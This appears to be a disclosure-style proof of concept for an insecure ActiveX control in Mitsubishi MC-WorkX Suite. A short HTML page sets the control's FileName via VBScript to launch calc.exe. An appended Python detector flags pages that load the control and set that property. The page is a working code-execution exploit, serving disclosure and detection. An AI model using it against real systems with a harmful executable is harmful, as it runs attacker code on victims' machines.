<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbitrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>
<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>
</html>
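A defender-side check for the pattern this proof of concept relies on, as an added example that is not part of the original advisory: it scans an HTML page for an `<object>` bound to the IcoLaunch CLSID and for script that assigns that object's `FileName` property. The function name `scan_page`, the helper class and the sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the IcoLaunch control, copied from the <object> tag on this page.
ICOLAUNCH_CLSID = "c28a127e-4a85-11d3-a5ff-00a0249e352d"

class _Collector(HTMLParser):
    """Records ids of <object> tags bound to the CLSID, plus every script body."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "object":
            # Normalise 'clsid:{...}' / 'CLSID:...' spellings before comparing.
            clsid = (a.get("classid") or "").lower().replace("clsid:", "").strip("{} ")
            if clsid == ICOLAUNCH_CLSID:
                self.ids.append(a.get("id") or "")
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan_page(html):
    """One finding per IcoLaunch instance; sets_filename marks script writes to FileName."""
    c = _Collector()
    c.feed(html)
    c.close()
    findings = []
    for obj_id in c.ids:
        # VBScript identifiers are case-insensitive, so match without regard to case.
        pat = re.compile(r"\b%s\s*\.\s*FileName\s*=" % re.escape(obj_id), re.I)
        hit = bool(obj_id) and any(pat.search(s) for s in c.scripts)
        findings.append({"id": obj_id, "sets_filename": hit})
    return findings

# Constructed samples (placeholder path; not captured traffic).
HIT = r"""<html><object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<script language='vbscript'>
target.FileName = "C:\placeholder\example.exe"
</script></html>"""
NO_SCRIPT = "<object classid='CLSID:{C28A127E-4A85-11D3-A5FF-00A0249E352D}' id='x'></object>"
BENIGN = "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='target'></object>"
```

A finding with `sets_filename` true is the combination the proof of concept uses; an instance without it still shows the control being loaded from web content.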